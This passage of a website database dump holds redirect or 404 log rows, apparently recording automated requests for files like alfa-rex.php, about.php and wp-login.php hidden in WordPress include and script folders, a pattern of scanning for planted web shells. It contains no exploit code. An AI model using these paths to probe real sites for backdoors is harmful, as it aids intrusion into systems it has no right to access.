05:20:33','0000-00-00 00:00:00',301),(53108,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/class-wp-interactivity-api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:20:34','0000-00-00 00:00:00',301),(53109,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/interactivity-api.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:35','0000-00-00 00:00:00',301),(53110,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:36','0000-00-00 00:00:00',301),(53111,'http://3s-technologies.com.tr/en/wp-includes/item.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:37','0000-00-00 00:00:00',301),(53112,'http://3s-technologies.com.tr/en/wp-includes/js/about.php',NULL,'https://www.google.de/','',5,0,'2025-12-20 05:20:38','0000-00-00 00:00:00',301),(53113,'http://3s-technologies.com.tr/en/wp-includes/js/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:20:39','0000-00-00 00:00:00',301),(53114,'http://3s-technologies.com.tr/en/wp-includes/js/codemirror/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:40','0000-00-00 00:00:00',301),(53115,'http://3s-technologies.com.tr/en/wp-includes/js/codemirror/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:41','0000-00-00 00:00:00',301),(53116,'http://3s-technologies.com.tr/en/wp-includes/js/codemirror/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:42','0000-00-00 00:00:00',301),(53117,'http://3s-technologies.com.tr/en/wp-includes/js/crop/about.php',NULL,'https://www.google.fr/','',18,0,'2025-12-20 05:20:43','0000-00-00 00:00:00',301),(53118,'http://3s-technologies.com.tr/en/wp-includes/js/crop/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:43','0000-00-00 00:00:00',301),(53119,'http://3s-technologies.com.tr/en/wp-includes/js/crop/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:44','0000-00-00 00:00:00',301),(53120,'http://3s-technologies.com.tr/en/wp-includes/js/dist/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:45','0000-00-00 00:00:00',301),(53121,'http://3s-technologies.com.tr/en/wp-includes/js/dist/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:20:46','0000-00-00 00:00:00',301),(53122,'http://3s-technologies.com.tr/en/wp-includes/js/dist/development/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:47','0000-00-00 00:00:00',301),(53123,'http://3s-technologies.com.tr/en/wp-includes/js/dist/development/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:20:48','0000-00-00 00:00:00',301),(53124,'http://3s-technologies.com.tr/en/wp-includes/js/dist/development/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:49','0000-00-00 00:00:00',301),(53125,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/a11y/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:20:50','0000-00-00 00:00:00',301),(53126,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/a11y/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:50','0000-00-00 00:00:00',301),(53127,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/a11y/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:20:51','0000-00-00 00:00:00',301),(53128,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:52','0000-00-00 00:00:00',301),(53129,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:53','0000-00-00 00:00:00',301),(53130,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:20:54','0000-00-00 00:00:00',301),(53131,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:55','0000-00-00 00:00:00',301),(53132,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/file/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:20:56','0000-00-00 00:00:00',301),(53133,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/file/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:20:57','0000-00-00 00:00:00',301),(53134,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/file/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:20:57','0000-00-00 00:00:00',301),(53135,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/image/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:58','0000-00-00 00:00:00',301),(53136,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/image/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:20:59','0000-00-00 00:00:00',301),(53137,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/image/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:00','0000-00-00 00:00:00',301),(53138,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/navigation/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:01','0000-00-00 00:00:00',301),(53139,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/navigation/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:21:02','0000-00-00 00:00:00',301),(53140,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/navigation/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:03','0000-00-00 00:00:00',301),(53141,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/query/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:03','0000-00-00 00:00:00',301),(53142,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/query/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:04','0000-00-00 00:00:00',301),(53143,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/query/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:05','0000-00-00 00:00:00',301),(53144,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/search/about.php',NULL,'https://www.google.com/','',10,0,'2025-12-20 05:21:06','0000-00-00 00:00:00',301),(53145,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/search/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:07','0000-00-00 00:00:00',301),(53146,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/search/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:08','0000-00-00 00:00:00',301),(53147,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/block-library/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:09','0000-00-00 00:00:00',301),(53148,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/interactivity/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:10','0000-00-00 00:00:00',301),(53149,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/interactivity/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:10','0000-00-00 00:00:00',301),(53150,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/interactivity/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:11','0000-00-00 00:00:00',301),(53151,'http://3s-technologies.com.tr/en/wp-includes/js/dist/script-modules/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:12','0000-00-00 00:00:00',301),(53152,'http://3s-technologies.com.tr/en/wp-includes/js/dist/vendor/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:13','0000-00-00 00:00:00',301),(53153,'http://3s-technologies.com.tr/en/wp-includes/js/dist/vendor/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:14','0000-00-00 00:00:00',301),(53154,'http://3s-technologies.com.tr/en/wp-includes/js/dist/vendor/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:15','0000-00-00 00:00:00',301),(53155,'http://3s-technologies.com.tr/en/wp-includes/js/dist/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:15','0000-00-00 00:00:00',301),(53156,'http://3s-technologies.com.tr/en/wp-includes/js/imgareaselect/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:16','0000-00-00 00:00:00',301),(53157,'http://3s-technologies.com.tr/en/wp-includes/js/imgareaselect/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:17','0000-00-00 00:00:00',301),(53158,'http://3s-technologies.com.tr/en/wp-includes/js/imgareaselect/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:18','0000-00-00 00:00:00',301),(53159,'http://3s-technologies.com.tr/en/wp-includes/js/jcrop/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:19','0000-00-00 00:00:00',301),(53160,'http://3s-technologies.com.tr/en/wp-includes/js/jcrop/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:20','0000-00-00 00:00:00',301),(53161,'http://3s-technologies.com.tr/en/wp-includes/js/jcrop/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:20','0000-00-00 00:00:00',301),(53162,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:21','0000-00-00 00:00:00',301),(53163,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:22','0000-00-00 00:00:00',301),(53164,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/ui/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:23','0000-00-00 00:00:00',301),(53165,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/ui/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:24','0000-00-00 00:00:00',301),(53166,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/ui/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:25','0000-00-00 00:00:00',301),(53167,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:26','0000-00-00 00:00:00',301),(53168,'http://3s-technologies.com.tr/en/wp-includes/js/mediaelement/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:26','0000-00-00 00:00:00',301),(53169,'http://3s-technologies.com.tr/en/wp-includes/js/mediaelement/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:27','0000-00-00 00:00:00',301),(53170,'http://3s-technologies.com.tr/en/wp-includes/js/mediaelement/renderers/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:28','0000-00-00 00:00:00',301),(53171,'http://3s-technologies.com.tr/en/wp-includes/js/mediaelement/renderers/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:21:29','0000-00-00 00:00:00',301),(53172,'http://3s-technologies.com.tr/en/wp-includes/js/mediaelement/renderers/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:30','0000-00-00 00:00:00',301),(53173,'http://3s-technologies.com.tr/en/wp-includes/js/mediaelement/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:31','0000-00-00 00:00:00',301),(53174,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:32','0000-00-00 00:00:00',301),(53175,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:32','0000-00-00 00:00:00',301),(53176,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox/themes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:33','0000-00-00 00:00:00',301),(53177,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:34','0000-00-00 00:00:00',301),(53178,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/langs/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:36','0000-00-00 00:00:00',301),(53179,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/langs/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:37','0000-00-00 00:00:00',301),(53180,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:38','0000-00-00 00:00:00',301),(53181,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:39','0000-00-00 00:00:00',301),(53182,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/charmap/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:39','0000-00-00 00:00:00',301),(53183,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/charmap/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:21:40','0000-00-00 00:00:00',301),(53184,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/charmap/wp-log1n.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:41','0000-00-00 00:00:00',301),(53185,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/charmap/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:42','0000-00-00 00:00:00',301),(53186,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/colorpicker/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:43','0000-00-00 00:00:00',301),(53187,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/colorpicker/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:44','0000-00-00 00:00:00',301),(53188,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/colorpicker/defaults.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:45','0000-00-00 00:00:00',301),(53189,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/colorpicker/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:46','0000-00-00 00:00:00',301),(53190,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/about.php',NULL,'https://www.yahoo.com/','',10,0,'2025-12-20 05:21:47','0000-00-00 00:00:00',301),(53191,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:47','0000-00-00 00:00:00',301),(53192,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/css/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:48','0000-00-00 00:00:00',301),(53193,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/css/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:49','0000-00-00 00:00:00',301),(53194,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/css/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:50','0000-00-00 00:00:00',301),(53195,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:51','0000-00-00 00:00:00',301),(53196,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/directionality/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:52','0000-00-00 00:00:00',301),(53197,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/directionality/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:53','0000-00-00 00:00:00',301),(53198,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/directionality/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:21:54','0000-00-00 00:00:00',301),(53199,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/fullscreen/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:21:55','0000-00-00 00:00:00',301),(53200,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/fullscreen/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:56','0000-00-00 00:00:00',301),(53201,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/fullscreen/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:21:57','0000-00-00 00:00:00',301),(53202,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/hr/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:21:57','0000-00-00 00:00:00',301),(53203,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/hr/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:21:58','0000-00-00 00:00:00',301),(53204,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/hr/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:21:59','0000-00-00 00:00:00',301),(53205,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/image/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:00','0000-00-00 00:00:00',301),(53206,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/image/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:01','0000-00-00 00:00:00',301),(53207,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/image/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:02','0000-00-00 00:00:00',301),(53208,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/link/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:03','0000-00-00 00:00:00',301),(53209,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/link/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:04','0000-00-00 00:00:00',301),(53210,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/link/item.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:22:04','0000-00-00 00:00:00',301),(53211,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/link/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:05','0000-00-00 00:00:00',301),(53212,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/tabfocus/options.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:06','0000-00-00 00:00:00',301),(53213,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/textcolor/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:07','0000-00-00 00:00:00',301),(53214,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/textcolor/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:08','0000-00-00 00:00:00',301),(53215,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/textcolor/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:09','0000-00-00 00:00:00',301),(53216,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wordpress/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:09','0000-00-00 00:00:00',301),(53217,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wordpress/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:10','0000-00-00 00:00:00',301),(53218,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wordpress/click.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:11','0000-00-00 00:00:00',301),(53219,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wordpress/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:12','0000-00-00 00:00:00',301),(53220,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:13','0000-00-00 00:00:00',301),(53221,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpautoresize/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:14','0000-00-00 00:00:00',301),(53222,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpautoresize/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:15','0000-00-00 00:00:00',301),(53223,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpautoresize/defaults.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:16','0000-00-00 00:00:00',301),(53224,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpautoresize/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:22:17','0000-00-00 00:00:00',301),(53225,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpeditimage/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:17','0000-00-00 00:00:00',301),(53226,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpeditimage/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:22:18','0000-00-00 00:00:00',301),(53227,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wpeditimage/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:20','0000-00-00 00:00:00',301),(53228,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wplink/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:21','0000-00-00 00:00:00',301),(53229,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wplink/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:22','0000-00-00 00:00:00',301),(53230,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wplink/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:23','0000-00-00 00:00:00',301),(53231,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wptextpattern/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:22:24','0000-00-00 00:00:00',301),(53232,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wptextpattern/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:25','0000-00-00 00:00:00',301),(53233,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/wptextpattern/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:26','0000-00-00 00:00:00',301),(53234,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:27','0000-00-00 00:00:00',301),(53235,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:27','0000-00-00 00:00:00',301),(53236,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:28','0000-00-00 00:00:00',301),(53237,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:29','0000-00-00 00:00:00',301),(53238,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/fonts/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:22:30','0000-00-00 00:00:00',301),(53239,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/fonts/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:31','0000-00-00 00:00:00',301),(53240,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/fonts/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:32','0000-00-00 00:00:00',301),(53241,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/img/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:32','0000-00-00 00:00:00',301),(53242,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/img/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:33','0000-00-00 00:00:00',301),(53243,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/img/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:34','0000-00-00 00:00:00',301),(53244,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:35','0000-00-00 00:00:00',301),(53245,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:36','0000-00-00 00:00:00',301),(53246,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:36','0000-00-00 00:00:00',301),(53247,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:37','0000-00-00 00:00:00',301),(53248,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/modern/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:38','0000-00-00 00:00:00',301),(53249,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/modern/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:39','0000-00-00 00:00:00',301),(53250,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/modern/item.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:40','0000-00-00 00:00:00',301),(53251,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/modern/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:41','0000-00-00 00:00:00',301),(53252,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:42','0000-00-00 00:00:00',301),(53253,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/utils/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:42','0000-00-00 00:00:00',301),(53254,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/utils/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:43','0000-00-00 00:00:00',301),(53255,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/utils/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:44','0000-00-00 00:00:00',301),(53256,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/wp-tinymce.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:45','0000-00-00 00:00:00',301),(53257,'http://3s-technologies.com.tr/en/wp-includes/js/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:46','0000-00-00 00:00:00',301),(53258,'http://3s-technologies.com.tr/en/wp-includes/kses.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:47','0000-00-00 00:00:00',301),(53259,'http://3s-technologies.com.tr/en/wp-includes/l10n.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:48','0000-00-00 00:00:00',301),(53260,'http://3s-technologies.com.tr/en/wp-includes/l10n/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:22:49','0000-00-00 00:00:00',301),(53261,'http://3s-technologies.com.tr/en/wp-includes/l10n/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:50','0000-00-00 00:00:00',301),(53262,'http://3s-technologies.com.tr/en/wp-includes/l10n/class-wp-translation-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:22:51','0000-00-00 00:00:00',301),(53263,'http://3s-technologies.com.tr/en/wp-includes/l10n/class-wp-translation-file-mo.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:52','0000-00-00 00:00:00',301),(53264,'http://3s-technologies.com.tr/en/wp-includes/l10n/class-wp-translation-file-php.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:52','0000-00-00 